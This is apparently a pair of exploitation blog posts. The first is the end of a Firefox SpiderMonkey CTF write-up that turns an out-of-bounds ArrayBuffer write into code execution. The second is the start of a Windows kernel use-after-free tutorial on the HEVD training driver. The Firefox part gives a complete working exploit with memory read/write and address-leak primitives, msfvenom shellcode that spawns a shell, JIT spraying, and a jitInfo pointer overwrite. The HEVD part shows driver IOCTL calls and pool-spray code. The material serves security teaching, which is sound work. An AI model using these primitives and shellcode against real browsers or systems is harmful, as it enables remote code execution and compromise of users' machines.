0x58dcd46a0b8:    0xfffe3ee4bd6007a0 (*typedArray)    0xfff8800000000000 (offset)
0x58dcd46a0c8:    0x4141414141414141 (data start)     0x0000000000000000 
0x58dcd46a0d8:    0x0000000000000000                  0x0000000000000000  
0x58dcd46a0e8:    0x0000000000000000                  0x0000000000000000  
0x58dcd46a0f8:    0x0000000000000000                  0x0000000000000000  
0x58dcd46a108:    0x0000000000000000                  0x0000000000000000 (data end)
0x58dcd46a118:    0xfffe4d4d4d4d4d4d                  0xfffe4d4d4d4d4d4d
0x58dcd46a128:    0x0000058dcd466700                  0x00005618d8518088
0x58dcd46a138:    0x00005618d8517828                  0x0000058dcd46a160 
0x58dcd46a148:    0x0000000000000050                  0xfffe3ee4bd6007e0
0x58dcd46a158:    0xfff8800000000000                  0x4242424242424242 
...

We can relatively easily find the same values in gdb by grepping for 0x4141414141414141 which we placed as the first value in the “A” array. To understand what these values are, we have to look at how these objects work internally. I annotated the first object in the debug view above to show what some of these values are representing.

The structure we see here is based on a NativeObject, which most JavaScript objects inherit from. In the source it does not look exactly like this, but it helps in understanding the layout (https://searchfox.org/mozilla-central/source/js/src/vm/NativeObject.h#547). I tried to illustrate the memory layout below (some of the names I made up):

---[Meta Data]---
*shape
*slots
*elementsHeader
*elementsData  --------------
byteLength                   |
*typedArrayObj               |
offset                       |
---[Data]---                 |
0x4141414141414141     <-----
...

shape: Points to names of properties and corresponding indices into the slots array.

slots: Points to an array of values for properties. Here: emptyObjectSlotsHeaders.

elementsHeader: Here emptyElementsHeader.

elementsData: Points to the data (our array contents).

byteLength: The byteLength we can set via the vulnerable setter.

typedArrayObj: This is a tagged pointer that is pointing to the BigUint64Array Metadata.

offset: Contains 0xfff8800000000000 which is the value zero, type tagged as an integer.

More detailed information can be found in this post: https://vigneshsrao.github.io/posts/play-with-spidermonkey/. The most important value, for now, is the data pointer (here: 0x0000058dcd46a0c8), which points to the actual data being stored in the ArrayBuffer. Since we set the length of ArrayBuffer “A” to 1000, we can read or write any of the following 125 (1000/8) values. If we were to overwrite the data pointer of ArrayBuffer “B” with a location where we want to read or write, we could then simply index into “B” to read or write anywhere in the process memory.

Let’s test this assumption and create some helper functions read64 and write64. These functions both use the out-of-bounds write we achieved via “A” to set the data pointer of “B” to a location of our choice. We then either read or set the value by indexing into “B” as TypedArray.

// create an ArrayBuffer A and set its length to a large value
aBuf = new ArrayBuffer(80);
aBuf.byteLength = 1000;
aBuf = new BigUint64Array(aBuf)
aBuf[0] = 0x4141414141414141n

// create a second ArrayBuffer B to have an adjacent object
bBuf = new ArrayBuffer(80);
bBufTyped = new BigUint64Array(bBuf)
bBufTyped[0] = 0x4242424242424242n
bBufTyped[1] = 0x4343434343434343n


function read64(addr){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    // access B as a TypedArray to get a 64 bit value back
    let typedB = new BigUint64Array(bBuf)
    // return first element (exactly where the changed data pointer points to)
    return typedB[0]
}

function write64(addr, value){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    // access B as a TypedArray so we can write a 64 bit value
    let typedB = new BigUint64Array(bBuf)
    // set first element (exactly where the changed data pointer points to)
    typedB[0] = value
}
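
The index 15 used in both helpers is not arbitrary. It can be derived from the annotated gdb dump shown earlier by taking the distance between the start of A's data and the address where B's elementsData pointer is stored. The sketch below redoes that arithmetic with the addresses from that dump; index_from_a is a hypothetical helper name, and the addresses differ between runs while the relative layout stayed the same in the dumps shown here.

```python
ELEMENT_SIZE = 8  # BigUint64Array element width in bytes

a_data_start = 0x58DCD46A0C8   # data start of A in the annotated dump
b_slots_field = 0x58DCD46A130  # where B's slots pointer is stored
b_data_field = 0x58DCD46A140   # where B's elementsData pointer is stored


def index_from_a(field_addr):
    """Index into A's typed array that lands exactly on field_addr."""
    offset = field_addr - a_data_start
    if offset % ELEMENT_SIZE != 0:
        raise ValueError("field is not 8-byte aligned relative to A's data")
    return offset // ELEMENT_SIZE


slots_index = index_from_a(b_slots_field)
data_index = index_from_a(b_data_field)
reachable = 1000 // ELEMENT_SIZE  # elements covered by the forged byteLength

print(slots_index, data_index, reachable)
```

The same calculation gives the index of B's slots pointer, which is the second metadata field that can be reached through A in this layout.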

Let’s test the read primitive by reading some values from pointers we see in gdb:

0x3f20d3c6a098: 0x000055fd568dc088  0x000055fd568db828
0x3f20d3c6a0a8: 0x00003f20d3c6a0c8  0x00000000000003e8
0x3f20d3c6a0b8: 0xfffe09cda9d007e0  0xfff8800000000000
0x3f20d3c6a0c8: 0x4141414141414141  0x0000000000000000
0x3f20d3c6a0d8: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a0e8: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a0f8: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a108: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a118: 0xfffe4d4d4d4d4d4d  0xfffe4d4d4d4d4d4d
0x3f20d3c6a128: 0x00003f20d3c66720  0x000055fd568dc088
0x3f20d3c6a138: 0x000055fd568db828  0x00003f20d3c6a160
0x3f20d3c6a148: 0x0000000000000050  0xfffe09cda9d00820
0x3f20d3c6a158: 0xfff8800000000000  0x4242424242424242
0x3f20d3c6a168: 0x4343434343434343  0x0000000000000000
0x3f20d3c6a178: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a188: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a198: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a1a8: 0x0000000000000000  0xfffe4d4d4d4d4d4d
0x3f20d3c6a1b8: 0xfffe4d4d4d4d4d4d  0x0000000000000000
0x3f20d3c6a1c8: 0x0000000000000000  0x000000000000000
js> console.log(read64(0x00003f20d3c6a160n).toString(16))
4242424242424242
js> console.log(read64(0x00003f20d3c6a168n).toString(16))
4343434343434343
js> console.log(read64(0x000055fd568dc088n).toString(16))
100000000

Writing works as well:

write64(0x00003f20d3c6a160n, 0xcafecafecafecafen)
js> console.log(read64(0x00003ed0df26a160n).toString(16))
cafecafecafecafe

One more primitive

Before we think about what we want to read or write we want to create another helper function that gives us the address of an arbitrary JavaScript object. This is very useful if we want to overwrite pointers in certain JavaScript Objects later on.

function addrof(obj){
    // Set a new property on the ArrayBuffer, it will be pointed to by the slots pointer (offset 13)
    bBuf.leak = obj
    // read the slots pointer back
    _slots = aBuf[13]
    // dereference the slots pointer and return it (while masking off any pointer tagging)
    return read64(_slots) & 0xffffffffffffn
}

This function requires some explanation. When we create a property on a JavaScript object, the object’s metadata holds a pointer to where those properties are stored (just like our data pointer from before). In the last memory dump we had no properties defined, but we can still see the slots pointer 2 values before the data pointer:

...
0x3f20d3c6a118: 0xfffe4d4d4d4d4d4d  0xfffe4d4d4d4d4d4d
0x3f20d3c6a128: 0x00003f20d3c66720  0x000055fd568dc088 < slots
0x3f20d3c6a138: 0x000055fd568db828  0x00003f20d3c6a160 < elementsData
0x3f20d3c6a148: 0x0000000000000050  0xfffe09cda9d00820
0x3f20d3c6a158: 0xfff8800000000000  0x424242424242424
...

Now if we define a custom property bBuf.leak and then use our read primitive to dereference the slots pointer, we get the address of our obj, which was placed in the slots array. Note that we must mask off the upper 2 bytes since these encode type information (pointer tagging).
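To make the masking step concrete, here is a minimal sketch that applies the same 48-bit mask as addrof() to one of the tagged values visible in the memory dump. The helper name untag and the constant PAYLOAD_MASK are made up for this illustration and are not part of the exploit.

```javascript
// Keep only the low 48 bits of a boxed 64-bit value.
// This is the same mask that addrof() applies before returning.
const PAYLOAD_MASK = 0xffffffffffffn;

// Hypothetical helper, named for this sketch only.
function untag(boxed) {
    return boxed & PAYLOAD_MASK;
}

// Tagged value copied from the memory dump (upper 2 bytes are 0xfffe).
const boxed = 0xfffe09cda9d00820n;
console.log(untag(boxed).toString(16)); // 9cda9d00820
```

A value that has no tag in its upper 2 bytes, such as the data pointer 0x00003f20d3c6a160, passes through the mask unchanged.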

Exploitation

If we think about exploitation, we want to get shellcode somewhere in memory and execute it. Unfortunately, it is not that easy: memory that is writable from JavaScript is not executable, and anything we write from JavaScript might just be interpreted and not even end up contiguous in memory. Even if we had our shellcode in executable memory, we would still need to find a way to jump to it using just JavaScript, since we have some primitives but no control over any registers or the instruction pointer.

Let’s solve the shellcode problem first. One way to get your own code into executable memory is to use double constants. I learned about this method in this SentinelOne blog post: https://www.sentinelone.com/labs/firefox-jit-use-after-frees-exploiting-cve-2020-26950/. Doubles have an 8-byte backing buffer, and if we define a bunch of them as constants one after another we can get our shellcode bytes into consecutive, executable memory. I wrote a simple online converter to convert shellcode to doubles: https://vulndev.io/shellcode-converter/.
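The conversion itself can be sketched in a few lines. This is not the code behind the online converter, just one plausible way to do it: the function names are invented for this example, and padding the last chunk with 0x90 (NOP) is an assumption. One caveat applies to any such converter: an 8-byte chunk that happens to encode a NaN may not survive the conversion bit for bit, so such chunks need to be avoided.

```javascript
// Pack shellcode bytes into IEEE-754 doubles, 8 bytes per constant.
// Padding the final chunk with 0x90 (NOP) is an assumption of this sketch.
function bytesToDoubles(bytes, pad = 0x90) {
    const padded = bytes.slice();
    while (padded.length % 8 !== 0) padded.push(pad);
    const view = new DataView(new Uint8Array(padded).buffer);
    const out = [];
    for (let off = 0; off < padded.length; off += 8) {
        out.push(view.getFloat64(off, true)); // little-endian, as on x86-64
    }
    return out;
}

// Inverse direction, useful to double-check a list of constants.
function doublesToBytes(doubles) {
    const view = new DataView(new ArrayBuffer(doubles.length * 8));
    doubles.forEach((d, i) => view.setFloat64(i * 8, d, true));
    return Array.from(new Uint8Array(view.buffer));
}

// First 8 bytes of the shellcode plus the trailing syscall (0x0f 0x05).
const demo = [0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x0f, 0x05];
const doubles = bytesToDoubles(demo);
console.log(doubles.length); // 2
console.log(doublesToBytes(doubles).map((b) => b.toString(16)).join(" "));
```

Converting the doubles back to bytes before pasting them into the exploit is a cheap way to catch a chunk that did not round-trip.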

Shellcode

msfvenom -p linux/x64/exec cmd="/bin/sh -c 'id; bash'" -f csharp

byte[] buf = new byte[58] {0x48,0xb8,0x2f,0x62,0x69,0x6e,
0x2f,0x73,0x68,0x00,0x99,0x50,0x54,0x5f,0x52,0x66,0x68,0x2d,
0x63,0x54,0x5e,0x52,0xe8,0x16,0x00,0x00,0x00,0x2f,0x62,0x69,
0x6e,0x2f,0x73,0x68,0x20,0x2d,0x63,0x20,0x27,0x69,0x64,0x3b,
0x20,0x62,0x61,0x73,0x68,0x27,0x00,0x56,0x57,0x54,0x5e,0x6a,
0x3b,0x58,0x0f,0x05};

Converted Shellcode

6.867659397734779e+246
7.806615353364766e+184
2.541954188459429e-198
3.2060568060029287e-80
3.4574612453438036e+198
7.57500810708945e-119
1.0802257739008538e+117
-6.828527034370483e-229

Now we define the constants in a function and then call it often enough to trigger the JIT compiler. The JIT compiler compiles JavaScript to native code when it is worthwhile (e.g. the code is used a lot) in order to optimize for speed. By calling our function many times we force this behavior. Now we can use our addrof primitive to get the address of our JITted function and then use gdb to inspect the memory. Note that we added the double for \x41\x41\x41\x41 as the first constant in order to find the shellcode in memory.

PoC_0x02.js

// create an ArrayBuffer A and set its length to a large value
aBuf = new ArrayBuffer(80);
aBuf.byteLength = 1000;
aBuf = new BigUint64Array(aBuf)

// create a second ArrayBuffer B to have an adjacent object
bBuf = new ArrayBuffer(80);
bBufTyped = new BigUint64Array(bBuf)

function read64(addr){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    let typedB = new BigUint64Array(bBuf)
    return typedB[0]
}

function write64(addr, value){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    // access B as a TypedArray to get a 64 bit value back
    let typedB = new BigUint64Array(bBuf)
    // set first element (exactly where the changed data pointer points to)
    typedB[0] = value
}

function addrof(obj){
    // Set a new property on the ArrayBuffer, its pointer will be pointed to by the slots pointer (offset 13)
    bBuf.leak = obj
    // read the slots pointer back
    _slots = aBuf[13]
    // dereference the slots pointer and return it (while masking off any pointer tagging)
    return read64(_slots) & 0xffffffffffffn
}

function shellcode (){
    EGG = 5.40900888e-315;          // 0x41414141 in memory, marker to find
    C01 = -6.828527034422786e-229;  // 0x9090909090909090
    C02 = 6.867659397734779e+246     
    C03 = 7.806615353364766e+184
    C04 = 2.541954188459429e-198
    C05 = 3.2060568060029287e-80
    C06 = 3.4574612453438036e+198
    C07 = 7.57500810708945e-119
    C08 = 1.0802257739008538e+117
    C09 = -6.828527034370483e-229    
}

// JIT Spray - will make sure the constants are compiled to native code and create our shellcode
for (let i = 0; i < 100000; i++) {
    shellcode();
}
console.log(addrof(shellcode).toString(16));
1362e6600860
js>

gef➤  tele 0x1362e6600860
0x001362e6600860│+0x0000: 0x00209976a3d160  →  0x00209976a3c0a0  →  0x0056278d78d150  →  0x0056278d845433  →  "Function"
0x001362e6600868│+0x0008: 0x0056278c099088  →  <emptyObjectSlotsHeaders+8> add BYTE PTR [rax], al
0x001362e6600870│+0x0010: 0x0056278c098828  →  <emptyElementsHeader+16> add BYTE PTR [rax], al
0x001362e6600878│+0x0018: 0xfff88000000000a0
0x001362e6600880│+0x0020: 0xfffe209976a3f038
0x001362e6600888│+0x0028: 0x00209976a68150  →  0x002762b3c15cb0  →  0x0fc4f640ec8b4855
0x001362e6600890│+0x0030: 0xfffb209976a652a0
0x001362e6600898│+0x0038: 0x007f71b6cdca18  →  0x007f71b6cdc000  →  0x007f71b6c18000  →  0x0000000000000000
0x001362e66008a0│+0x0040: 0x00209976a6c1c0  →  0x00209976a3c2c8  →  0x0056278d793a90  →  0x0056278bf5b763  →  "BigUint64Array"
0x001362e66008a8│+0x0048: 0x0056278c099088  →  <emptyObjectSlotsHeaders+8> add BYTE PTR [rax], al

This gives us the address of the JSFunction object of the function. When we look at offset 0x28 we can see an interesting pointer to a heap region. This is the jitInfo pointer (JSFunction.u.native.extra.jitInfo); dereferencing it leads to the JIT code of the function at 0x002762b3c15cb0. This region contains more than just our shellcode though, since we only defined constants and they are treated as data at this point. We can disassemble at that address and notice that it looks like “real” instructions and not some random data:

x/100i 0x002762b3c15cb0

0x2762b3c15cb0:      push   rbp
0x2762b3c15cb1:      mov    rbp,rsp
0x2762b3c15cb4:      test   spl,0xf
0x2762b3c15cb8:      je     0x2762b3c15cbf
0x2762b3c15cbe:      int3
   ...

So let’s search for our marker and compare the pointers:

gef➤  grep 0x41414141
...
0x2762b3c16d90 - 0x2762b3c16d94  →   "AAAA"
...

We calculate: 0x2762b3c16d90 - 0x002762b3c15cb0 = 0x10E0. This means the JIT area of this function is actually pretty big, but if we search forward through it we will eventually find our marker. Let’s see if the constants ended up in memory as our shellcode:

x/20xg 0x2762b3c16d90

0x2762b3c16d90: 0x0000000041414141      0x9090909090909090
0x2762b3c16da0: 0x732f6e69622fb848      0x66525f5450990068
0x2762b3c16db0: 0x16e8525e54632d68      0x2f6e69622f000000
...

And as we can see, we found not only our marker but also the shellcode we intended in the correct order on a read/execute page.
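The two checks above (the distance to the marker and the byte order of the constants) can be reproduced outside the debugger. The sketch below uses only values copied from the gdb output and the msfvenom bytes; the helper qwordToBytes is a name chosen for this example.

```javascript
// Addresses copied from the gdb session.
const jitStart = 0x2762b3c15cb0n;
const markerAddr = 0x2762b3c16d90n;

// Distance from the start of the JIT code to the marker, in bytes and in 8-byte reads.
const offset = markerAddr - jitStart;
console.log(offset.toString(16), offset / 8n); // 10e0 540n

// Split a 64-bit value into its bytes in memory order (little-endian).
function qwordToBytes(q) {
    const bytes = [];
    for (let i = 0n; i < 8n; i++) {
        bytes.push(Number((q >> (8n * i)) & 0xffn));
    }
    return bytes;
}

// The two qwords that follow the NOP constant in the dump.
const dumped = [0x732f6e69622fb848n, 0x66525f5450990068n];
// First 16 bytes of the msfvenom shellcode.
const expected = [0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73,
                  0x68, 0x00, 0x99, 0x50, 0x54, 0x5f, 0x52, 0x66];

const recovered = dumped.flatMap(qwordToBytes);
console.log(recovered.every((b, i) => b === expected[i])); // true
```

In this run the marker sits 540 eight-byte reads into the region, so a forward scan in 8-byte steps needs at least that many iterations to reach it.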

After having solved the “shellcode problem” we still need a way to dynamically locate it (since it’s somewhere at a changing offset from where the jitInfo pointer points) and transfer execution to it. Finding the location is not that difficult as we can use our read primitive to scan the memory until we find the marker:

...
shellcode_addr = addrof(shellcode);
console.log("[>] Function @ " + shellcode_addr.toString(16));

// Get the jitInfo pointer in the JSFunction object (JSFunction.u.native.extra.jitInfo_)
jitinfo = read64(shellcode_addr + 0x28n);
console.log("[>] Jitinfo @ " + jitinfo.toString(16));

// Dereference pointer to get RX Region
rx_region = read64(jitinfo & 0xffffffffffffn);
console.log("[>] Jit RX @ " + rx_region.toString(16));


// Iterate to find magic value (since the shellcode is not at the start of the rx_region)
it = rx_region; // Start from the RX region
found = false
for(i = 0; i < 0x800; i++) {
    data = read64(it);
    if(data == 0x41414141n) {
        it = it + 8n;  // 8 byte offset to account for magic value
        found = true;
        break;
    }
    it = it + 8n;
}
if(!found) {
    console.log("[-] Failed to find Jitted shellcode in memory");
} 

There is one problem here – if you run it in the debug version it fails:

Assertion failure: !cx->nursery().isInside(ptr)

When running release it does however work. Debug adds some assertions to make sure nothing funky is going on – so most of the time it’s a good idea to start with the debug version but switch to release at some point. In this case, the challenge itself is however also running in debug mode so we will have to fix our exploit to work around that! What I noticed other people are doing to get around this is essentially looping until the shellcode pointer changes (often with some additional logic that didn’t appear to be required) – I have no idea why this is required but it works (please let me know!). So what we can add is a simple loop that waits for that change to occur:

shellcode_addr = addrof(shellcode);   
while(shellcode_addr == addrof(shellcode)){
        // just block until we get the updated addr 
}
shellcode_addr = addrof(shellcode);   

With that last problem out of the way, transferring execution to our shellcode is actually quite easy because we can just write to the jitInfo pointer with the location of our shellcode:

write64(jitinfo, shellcode_location);
shellcode();

With this, we modified the native code that is executed whenever we call the shellcode function. Remember that before we did define some constants but it was never intended to be code – just (constant) data. By setting the jitInfo pointer forward to these constants we make it code! With this last part being done, we now have a full PoC and can run it to execute commands:

Full exploit

// create an ArrayBuffer A and set its length to a large value
aBuf = new ArrayBuffer(80);
aBuf.byteLength = 1000;
aBuf = new BigUint64Array(aBuf)

// create a second ArrayBuffer B to have an adjacent object
bBuf = new ArrayBuffer(80);
bBufTyped = new BigUint64Array(bBuf)

function read64(addr){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    let typedB = new BigUint64Array(bBuf)
    return typedB[0]
}

function write64(addr, value){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    // access B as a TypedArray to get a 64 bit value back
    let typedB = new BigUint64Array(bBuf)
    // set first element (exactly where the changed data pointer points to)
    typedB[0] = value
}

function addrof(obj){
    // Set a new property on the ArrayBuffer, its pointer will be pointed to by the slots pointer (offset 13)
    bBuf.leak = obj
    // read the slots pointer back
    _slots = aBuf[13]
    // dereference the slots pointer and return it (while masking off any pointer tagging)
    return read64(_slots) & 0xffffffffffffn
}

function shellcode (){
    EGG = 5.40900888e-315;          // 0x41414141 in memory, marker to find
    C01 = -6.828527034422786e-229;  // 0x9090909090909090
    C02 = 6.867659397734779e+246     
    C03 = 7.806615353364766e+184
    C04 = 2.541954188459429e-198
    C05 = 3.2060568060029287e-80
    C06 = 3.4574612453438036e+198
    C07 = 7.57500810708945e-119
    C08 = 1.0802257739008538e+117
    C09 = -6.828527034370483e-229
}

// JIT Spray - will make sure the constants are compiled to native code and create our shellcode
for (let i = 0; i < 100000; i++) {
    shellcode();
}

// workaround to make the exploit work in release and debug version
shellcode_addr = addrof(shellcode);   
while(shellcode_addr == addrof(shellcode)){
    // just block until we get the updated addr 
}
shellcode_addr = addrof(shellcode);   
console.log("[>] Function @ " + shellcode_addr.toString(16));

// Get the jitInfo pointer in the JSFunction object (JSFunction.u.native.extra.jitInfo_)
jitinfo = read64(shellcode_addr + 0x28n);
console.log("[>] Jitinfo @ " + jitinfo.toString(16));

// Dereference pointer to get RX Region
rx_region = read64(jitinfo & 0xffffffffffffn);
console.log("[>] Jit RX @ " + rx_region.toString(16));


// Iterate to find magic value (since the shellcode is not at the start of the rx_region)
it = rx_region; // Start from the RX region
found = false
for(i = 0; i < 0x800; i++) {
    data = read64(it);
    if(data == 0x41414141n) {
        it = it + 8n;  // 8 byte offset to account for magic value
        found = true;
        break;
    }
    it = it + 8n;
}
if(!found) {
    console.log("[-] Failed to find Jitted shellcode in memory");
}  

shellcode_location = it;
console.log("[>] Shellcode @ " + shellcode_location.toString(16));

// Overwrite jitInfo pointer and execute modified function
write64(jitinfo, shellcode_location);
shellcode();

This yields a shell:

[>] Function @ 279b70d00860
[>] Jitinfo @ 159537965150
[>] Jit RX @ 2ed9ab64b990
[>] Shellcode @ 2ed9ab64bd30
uid=1000(xct) gid=1000(xct) groups=1000(xct)
xct@kali:/home/xct$

For the remote version, just replace the shellcode with something that will grab the flag – I’ll leave that as an exercise for the reader ;)

The post Browser Exploitation: Firefox OOB to RCE appeared first on Vulndev.

Windows Kernel Exploitation – HEVD x64 Use-After-Free

By: xct
14 July 2022 at 19:48

This part will look at a Use-After-Free vulnerability in HEVD on Windows 11 x64.

Vulnerability Discovery


We are going to tackle this based on the source instead of the assembly again. There are 4 functions that are interesting for the UAF vulnerability:

  • AllocateUaFObjectNonPagedPool
  • FreeUaFObjectNonPagedPool
  • AllocateFakeObjectNonPagedPool
  • UseUaFObjectNonPagedPool

The general idea is that we allocate an object on the kernel heap (on the non-paged pool, which is an area of memory that cannot be paged out) using AllocateUaFObjectNonPagedPool. Then we call FreeUaFObjectNonPagedPool, which will free the object. If done correctly, there should be no references to the object left in the kernel. This is however not the case here. On allocate, a global variable g_UseAfterFreeObjectNonPagedPool is set to the address of the object:

NTSTATUS AllocateUaFObjectNonPagedPool(VOID) {
    ...
    UseAfterFree = (PUSE_AFTER_FREE_NON_PAGED_POOL) ExAllocatePoolWithTag(NonPagedPool, sizeof(USE_AFTER_FREE_NON_PAGED_POOL), (ULONG)POOL_TAG);
    ...
    g_UseAfterFreeObjectNonPagedPool = UseAfterFree;
    ...  
}

Then when the object gets freed, this reference does not get set to NULL, so it is still pointing to the now freed memory.

NTSTATUS FreeUaFObjectNonPagedPool(VOID){
    ...
    ExFreePoolWithTag((PVOID)g_UseAfterFreeObjectNonPagedPool, (ULONG)POOL_TAG);
    ...
}

This in itself would not be a huge issue but this global variable is actually being used by UseUaFObjectNonPagedPool which is running a method called Callback on it:

NTSTATUS UseUaFObjectNonPagedPool(VOID) {
    ...
    if (g_UseAfterFreeObjectNonPagedPool->Callback) {
        g_UseAfterFreeObjectNonPagedPool->Callback();
    }
    ...
}

When the global object has been freed and this function is invoked, we have undefined behavior. One possibility is that another object of the same size takes its place, and then the driver would attempt to call the Callback function on the new object instead (which for a random object will likely fail since its memory layout will be completely different). HEVD has an AllocateFakeObjectNonPagedPool function that conveniently allows us to create a user-controlled object of the same size. There is however the issue of getting it exactly into the spot of the object that was just freed: Windows randomizes heap allocations, so a new allocation could be created anywhere.

Exploitation

Before starting with any exploitation we have to understand where our object is, how big it is and what a replacement object should look like. We also need to find a way to fill the hole with our object which is not straightforward.

We start with some template code that just allocates the object, triggers a breakpoint, and then frees the object again should we let execution continue:

#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>

#define ALLOCATE_UAF_IOCTL 0x222013
#define FREE_UAF_IOCTL 0x22201B
#define USE_UAF_IOCTL 0x222017

int main() {
    DWORD bytesWritten;
    // Open a handle to the HEVD device
    HANDLE hDriver = CreateFileW(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE) {
        printf("[!] Error while creating a handle to the driver: %lu\n", GetLastError());
        exit(1);
    }

    // Allocate UAF Object (no input or output buffer, so both sizes are 0)
    DeviceIoControl(hDriver, ALLOCATE_UAF_IOCTL, NULL, 0, NULL, 0, &bytesWritten, NULL);
    // Debug
    DebugBreak();
    // Free UAF Object
    DeviceIoControl(hDriver, FREE_UAF_IOCTL, NULL, 0, NULL, 0, &bytesWritten, NULL);

    return 0;
}

We saw in the allocate function earlier that it allocates the object in the non-paged pool using ExAllocatePoolWithTag. The tag it uses (here “Hack”) is a way to identify objects in that pool. We can search for all objects tagged this way in the debugger:

0: kd> !poolused 2 Hack
...
               NonPaged                  Paged
 Tag     Allocs         Used     Allocs         Used

 Hack         1          112          0            0	UNKNOWN pooltag 'Hack', please update pooltag.txt

TOTAL         1          112          0            0

This shows that currently there is exactly one allocation with that tag (the one we just created ourselves). Let’s now find the address of that object:

0: kd> !poolfind Hack -nonpaged
ffffe60269102050 : tag Hack, size      0x60, Nonpaged pool

This works but can take a lot of time. An alternative is to break on allocations as they happen by setting ed nt!PoolHitTag 'Hack'. For now, we are going to stick with the address we just got from poolfind. It shows us that the size of the object is 0x60 (plus a 0x10-byte pool header, which gives the 112 bytes reported by poolused), which means that we later need to find some native Windows kernel object that has the same size.

0: kd> dq ffffe60269102050 L0xC
ffffe602`69102050  fffff800`31117c58 41414141`41414141
ffffe602`69102060  41414141`41414141 41414141`41414141
ffffe602`69102070  41414141`41414141 41414141`41414141
ffffe602`69102080  41414141`41414141 41414141`41414141
ffffe602`69102090  41414141`41414141 41414141`41414141
ffffe602`691020a0  41414141`41414141 00000000`00414141

We can see that this object is mostly filled with “A”s. Only the first value is a function pointer, and this is exactly the callback we identified in the Vulnerability Discovery section. If we compare that with the structure definition in the source, it matches our assumption:

typedef struct _USE_AFTER_FREE_NON_PAGED_POOL {
    FunctionPointer Callback;
    CHAR Buffer[0x54];
} USE_AFTER_FREE_NON_PAGED_POOL, *PUSE_AFTER_FREE_NON_PAGED_POOL;

You might have noticed that the members do not exactly add up to 0x60 (0x54 + 8 = 0x5C). The remaining 4 bytes are most likely alignment padding, since the compiler rounds the structure size up to a multiple of its 8-byte pointer member (we can see they are zero). Now that we know the size, we are looking for another kernel object that is suitable for us.
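The size arithmetic can be written down as a short sketch. It assumes the usual x64 rule that a structure is padded to a multiple of its largest member alignment (8 bytes here) and takes the 0x10-byte pool header from the text. The constant and function names are chosen for this example.

```javascript
const POINTER_SIZE = 8;        // x64 function pointer (Callback)
const BUFFER_SIZE = 0x54;      // CHAR Buffer[0x54]
const POOL_HEADER_SIZE = 0x10; // pool header size quoted in the text

// Round value up to the next multiple of alignment.
function alignUp(value, alignment) {
    return Math.ceil(value / alignment) * alignment;
}

const rawSize = POINTER_SIZE + BUFFER_SIZE;        // sum of the members
const structSize = alignUp(rawSize, POINTER_SIZE); // size after padding
const chunkSize = structSize + POOL_HEADER_SIZE;   // what poolused reports

console.log(rawSize.toString(16), structSize.toString(16), chunkSize);
// 5c 60 112
```

The last number matches the 112 bytes that !poolused reported for the Hack tag.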

There is some excellent research by Alex Ionescu on Kernel Fengshui which dives into this topic and shows that using CreatePipe and WriteFile allows allocating an almost arbitrary size object (> 0x48) in the non-paged pool. Let’s create such an object and try to find it in memory so we can confirm it has indeed the correct size.

void Error(const char* name) {
    printf("%s Error: %d\n", name, GetLastError());
    exit(-1);
}

typedef struct PipeHandles {
    HANDLE read;
    HANDLE write;
} PipeHandles;

PipeHandles CreatePipeObject() {
    DWORD ALLOC_SIZE = 0x70;
    BYTE uBuffer[0x28]; // ALLOC_SIZE - HEADER_SIZE (0x48)
    HANDLE readPipe = NULL;
    HANDLE writePipe = NULL;
    DWORD resultLength;

    RtlFillMemory(uBuffer, 0x28, 0x41);
    if (!CreatePipe(&readPipe, &writePipe, NULL, sizeof(uBuffer))) {
        Error("CreatePipe");
    }
   
    if (!WriteFile(writePipe, uBuffer, sizeof(uBuffer), &resultLength, NULL)) {
        Error("WriteFile");
    }  
    return PipeHandles{ readPipe, writePipe };
}

After adding the function to create such pipe objects we can now create one in our main function:

int main() {
   ...
   PipeHandles pipeHandle = CreatePipeObject();
   printf("[>] Handles: 0x%llx, 0x%llx\n", (ULONGLONG)pipeHandle.read, (ULONGLONG)pipeHandle.write);
   getchar();
   DebugBreak();
}

When we run this, we get the handles to the pipes printed out, allowing us to inspect them:

C:\Users\xct\Desktop>exploit.exe
[>] Handles: 0xa8, 0xac
1: kd> !handle 0xa8
PROCESS ffffe6026dceb080
    SessionId: 1  Cid: 18c0    Peb: 27c6f1f000  ParentCid: 10e8
    DirBase: 1ad85d000  ObjectTable: ffff968b91808b00  HandleCount:  43.
    Image: exploit.exe

Handle table at ffff968b91808b00 with 43 entries in use
00a8: Object: ffffe602706bda30  GrantedAccess: 00120189 Entry: ffff968b8f5ff2a0
Object: ffffe602706bda30  Type: (ffffe602696fa7a0) File
    ObjectHeader: ffffe602706bda00 (new version)
        HandleCount: 1  PointerCount: 32768

We can see that it is a file object, that it’s used by our process, and the address it is at. Let’s inspect the memory further:

1: kd> !address ffffe602706bda30
...
Usage:                  
Base Address:           ffffcb8a`6b5d5000
End Address:            fffff780`00000000
Region Size:            00002bf5`94a2b000
VA Type:                SystemRange

1: kd> !pool ffffe602706bda30
Pool page ffffe602706bda30 region is Nonpaged pool
 ffffe602706bd050 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bd1e0 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bd370 size:  190 previous size:    0  (Free)       File
 ffffe602706bd500 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bd690 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bd820 size:  190 previous size:    0  (Allocated)  File
*ffffe602706bd9b0 size:  190 previous size:    0  (Allocated) *File
		Pooltag File : File objects
 ffffe602706bdb40 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bdcd0 size:  190 previous size:    0  (Allocated)  File
 ffffe602706bde60 size:  190 previous size:    0  (Allocated)  File

